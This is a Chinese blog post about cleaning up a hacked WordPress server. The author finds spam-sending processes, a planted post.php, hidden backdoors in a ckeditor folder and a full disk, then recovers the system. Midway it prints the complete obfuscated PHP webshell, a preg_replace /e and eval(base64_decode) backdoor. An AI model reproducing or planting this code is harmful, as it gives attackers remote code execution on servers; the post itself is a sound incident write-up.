最新消息:欢迎光临!

记第一次被挂马

网络安全 findever 1751浏览 0评论

事情系截个样子德…

本来因为个技术问题想写一篇文章记录来着,熟练输入后台URl,结果发现竟然登录后台时成功又跳转回登录页了..简直fu**,第一反应是session没开?但是转又想哥用的wordpress呢,所以这个猜想显然不能成立。然后去百度找原因,都说是啥路由器导致的,让改动cookie保存位置,然后反正死马当活马医,直接就准备改文件试试了,but …

在输入vim ***.php时,跳动了一下红色的错误提示,刚开始没注意(急着想把后台登录整好先),修改文件后保存试了下登录,果然。。还是不行~~

这个时候就有点烦躁了,准备好好看下那个文件,随手修改了下,然后保存的时候vim又提示了错误,红红的很显眼,(文件打开时提示:”E303 can’t open swap file for xxxx ,recovery impossable”,而保存的时候提示:”E128 Can’t write viminfo file /root/.viminfo! ” 这不能忍啊,赶紧百度一下错误(vim的 help乱码了),然后捏,介个百度就说了,.viminfo同级目录下存在很多tmp临时文件,但是我ls -la 一看,木有啊~!这就奇了怪了,还怀疑目录不可写的问题,vim里set directory?一看,.,/tmp,/var/tmp,这不要目录有目录,要权限有权限的吗!

想必到这个银都有点小崩溃了,于是只好请教万能的网友,@歪过人 说,“系不系.viminfo文件被占用了啊”,显然木有啊~!但是还是随手ps aux|grep vi看了下,hey,还别说,vim被占用倒是没看着,看到的却是满屏满屏的sendmail…

不消说,这么反常肯定有猫,于是乎先截个图发群里,就立马 ps aux|grep sendmail|cut -c 9-15|xarag kill -9 将其干掉了(干掉sendmail后又出现了另一批postdrop进程,直接杀杀杀,不再细讲),同时也留意到了这些sendmail的对象都是@林爷的域名邮箱,虽然是各种猜解邮箱,but可以肯定的是,林爷的web出问题啦…

出问题怎么查呢,第一反应是nginx的vhost配置,cat了下林爷的host配置,没发现什么问题,但却无意扫到了accesslog配置,咦,那就去瞄一眼呗~

不看不知道,一看吓一跳啊,又是满屏的刷/post.php,我可不记得wordpress根目录下有介个文件啊,先百度一下请求的来源ip(xx.xx.x.xxx)德国货!

再cat下post.php文件看看,哟,您瞧:

$obw3P=chr(112)."\x72".chr(101)."g\x5F".chr(114)."e\x70l\x61".chr(99)."\x65";$nb9Y="\x65\x76a".chr(108)."(ba\x73".chr(101)."\x36".chr(52)."_de\x63\x6F\x64e\x28".chr(34).chr(81)."\x47\x56\x79\x63m9\x79".chr(88).chr(51)."J".chr(108)."c\x47\x39y".chr(100).chr(71).chr(108)."\x75Z".chr(121)."g".chr(119)."\x4BTs".chr(78)."\x43k".chr(66).chr(112)."\x62".chr(109)."l\x66\x63\x32\x560".chr(75).chr(67)."\x4Ak\x61\x58".chr(78)."wbG\x46\x35\x58\x32V".chr(121)."\x63m".chr(57)."y\x63yI\x73M\x43\x6B\x37\x44".chr(81).chr(112)."A".chr(97).chr(87)."\x35p".chr(88)."3\x4e\x6Cd\x43".chr(103).chr(105).chr(98).chr(71).chr(57)."nX\x32\x56".chr(121)."c".chr(109)."\x39y\x63".chr(121).chr(73).chr(115)."\x4dC\x6B7D\x51".chr(112)."A\x61W".chr(53)."\x70\x583N\x6C".chr(100)."\x43\x67".chr(105)."Z\x58\x4A\x79\x62".chr(51)."\x4a".chr(102)."\x62G9n\x49\x69".chr(119)."wKTs\x4E".chr(67)."g".chr(48).chr(75)."\x61".chr(87).chr(89)."g\x4B\x47l".chr(122).chr(99).chr(50).chr(86)."\x30KC".chr(82)."f\x55\x45\x39T\x56".chr(67)."\x6B".chr(103).chr(74)."i".chr(89).chr(103)."a".chr(88).chr(78)."\x66Y".chr(88).chr(74)."\x79\x59".chr(88).chr(107)."\x6f".chr(74)."F9\x51".chr(84)."1NU\x4BSAm\x4Ai".chr(66)."\x6a".chr(98)."\x33".chr(86)."u\x64\x43\x67\x6BX".chr(49)."BP\x55\x31".chr(81)."\x70\x50".chr(106).chr(69)."pD".chr(81).chr(112)."7D\x51o\x4a".chr(90).chr(109).chr(57).chr(121)."\x5a".chr(87)."Fj\x61C\x41\x6f".chr(74)."F9\x51\x54\x31\x4E\x55\x49\x47\x46".chr(122)."\x49C\x522".chr(89)."\x58".chr(73)."\x70DQ\x6f".chr(74)."e".chr(119).chr(48)."K".chr(67).chr(81)."\x6c\x70\x5a".chr(105)."\x41\x6F".chr(73).chr(87).chr(108).chr(122)."c".chr(50)."\x56\x30KC\x52".chr(106)."b2Rl\x4BS\x6B\x67J\x47N\x76\x5A\x47\x55".chr(103)."P\x53".chr(65).chr(107)."\x64".chr(109).chr(70).chr(121)."O\x77".chr(48).chr(75).chr(67).chr(81)."ll\x62".chr(72).chr(78)."\x6caW\x59".chr(103).chr(75)."\x43F".chr(112)."\x63\x33".chr(78).chr(108)."\x64".chr(67)."\x67".chr(107)."c\x47\x46".chr(122)."\x63".chr(121).chr(107).chr(112).chr(73)."\x43\x52w\x59".chr(88).chr(78)."\x7A\x49\x440\x67".chr(74)."H\x5A\x68c\x6A\x73\x4e".chr(67)."gkJ\x5a".chr(87).chr(120).chr(122).chr(90)."S".chr(66)."i\x63\x6D\x56\x68a\x7A\x73".chr(78).chr(67).chr(103)."\x6c\x39\x44".chr(81)."\x6f\x4eC".chr(103).chr(108)."\x70\x5a\x69".chr(65).chr(111)."J\x48\x42\x68".chr(99)."\x33MgP".chr(84)."\x30".chr(103).chr(73)."\x6dl5VF".chr(112)."2".chr(98)."n\x52\x75\x63".chr(108)."E".chr(53)."\x52\x47p".chr(54)."\x59\x56\x64".chr(48)."Z".chr(71)."\x56\x30".chr(84)."G".chr(86)."l".chr(79)."X".chr(86)."\x73\x4F\x46\x6b3ZW".chr(69)."w".chr(73)."i\x6B".chr(78)."\x43".chr(103)."\x6C7DQo\x4a".chr(67)."WV2Y\x57".chr(119).chr(111)."\x59\x6d".chr(70)."\x7A\x5A".chr(84)."\x59\x30\x582".chr(82).chr(108)."\x59\x329kZ".chr(83)."\x67\x6b\x59\x329\x6B\x5A\x53".chr(107)."pO".chr(119)."\x30\x4b\x43X".chr(48)."\x4e\x43".chr(110).chr(48).chr(78)."C".chr(109)."\x56".chr(52).chr(97)."\x58\x51".chr(55)."\x22".chr(41).chr(41).";";$Rv1Vr5=chr(47).chr(102)."01e\x64\x34\x31cf".chr(49)."\x36".chr(50)."\x62".chr(101)."0".chr(56)."5\x35\x625".chr(98)."c".chr(48).chr(54)."2".chr(54)."5".chr(102).chr(49)."\x32a\x64/e";$obw3P($Rv1Vr5,$nb9Y,"f01e".chr(100)."\x341".chr(99)."f".chr(49)."\x36".chr(50)."b\x65".chr(48).chr(56).chr(53)."5\x62".chr(53)."\x62\x63\x30\x362".chr(54).chr(53).chr(102)."\x31\x32".chr(97).chr(100));

这不是标准的小马吗…

赶紧down下来发给小朋友们欣赏去了…然后把文件re了个名,小酣一下~

醒来后继续折腾,不出意外的小伙伴已经将内容反解粗来了,然后并没有什么鬼用,懒得管马了,先跑去找剩余的马和系统修复了,哥的vim和yum都还不能用呢!!

通过分析access请求(这里略去各种grep、grep -v不讲),又揪出了几个隐藏的马(在ckeditor目录下哦,这货肯定不行要被干掉,请默哀),也没啥研究的兴趣,还有好多事要忙的好吧…

之前尝试yum的时候隐约看到no space的字眼,于是df -h /瞧了下,空间剩余0.x%..

我去..不给活路啊

没办法,du -h –max-depth=1 ./ 慢慢找吧,一层一层找下来,发现是log目录下的sendmail和postdrop两个日志大户把磁盘占满了,在sendmail目录下直接rm -rf * 竟然还提示参数过多 = =囧不,只好回上一级rm -rf sendmail/* 再rm  -rf sendmail
日志清理完了再df -h /看下,哈 ,availed 90%,再试下yum,no problem,然后vim,peferct~~(万万没想到这俩货运行不了只是因为空间不足..如果让那个种小马的小b知道我是因为vim不能用而发现的被种马,不知道会不会说一句:oh no~)
恢复好系统后,检查下林爷的网站有没有受伤吧,不出意外网页上多了很多英文的文章,也懒得看了,一键删之,再把wordpress升级,ckeditor干掉,装上kindeditor,hu~~

至此,第一次被中马的经历就差不多结束了,后续有时间再反查下那个捣蛋的小鬼吧,连accesslog都没擦,估计也就是个工具仔吧

转载请注明:Findever » 记第一次被挂马

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

网友最新评论 (1)

  1. 看上去叼叼的…………
    小木4年前 (2015-12-07)回复